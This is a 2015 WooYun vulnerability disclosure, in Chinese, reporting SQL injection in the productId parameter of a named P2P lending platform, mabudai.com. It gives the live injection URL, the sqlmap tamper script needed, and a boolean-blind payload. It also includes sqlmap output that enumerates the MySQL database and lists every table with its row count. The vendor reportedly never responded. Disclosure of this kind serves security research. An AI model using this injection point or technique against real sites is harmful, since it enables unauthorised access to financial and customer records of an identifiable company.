当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157727

漏洞标题:P2P金融安全之麻布贷存在SQL注入漏洞

相关厂商:麻布贷

漏洞作者: Nelion

提交时间:2015-12-05 00:18

修复时间:2016-01-19 00:20

公开时间:2016-01-19 00:20

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

P2P金融麻布贷存在SQL注入漏洞,需使用tamper脚本space2morehash.py。

详细说明:

麻布贷:麻布袋(上海)投资管理有限公司(以下简称“麻布袋)----中国农业产业链变革者。麻布袋专注于农业,理念是责任、理想、品质。(官网介绍)
1、注入点:

http://www.mabudai.com/product/requestData?productId=549


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: productId=540 AND 1304=1304
---
[18:40:19] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[18:40:19] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5

漏洞证明:

2、数据库:

available databases [1]:
[*] mabudai_deal


3、库中表和数据量:

Database: mabudai_deal
+-------------------+---------+
| Table | Entries |
+-------------------+---------+
| tender_repayment | 6630 |
| transfer | 3009 |
| tender | 2127 |
| tender_loan | 2127 |
| tender_unfreeze | 2127 |
| product_repayment | 1146 |
| request_attach | 487 |
| product | 248 |
| product_content | 248 |
| product_invest | 248 |
| product_process | 248 |
| product_protocol | 248 |
| product_risk | 248 |
| product_time | 248 |
| request | 81 |
| request_content | 81 |
| request_reject | 81 |
| bank_limit | 78 |
| request_company | 53 |
| request_field | 36 |
| request_person | 29 |
| brand_pic | 21 |
| product_attach | 13 |
| brand | 5 |
| request_qqw | 5 |
| request_finance | 2 |
| product_field | 1 |
+-------------------+---------+

修复方案:

参数过滤

版权声明:转载请注明来源 Nelion@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝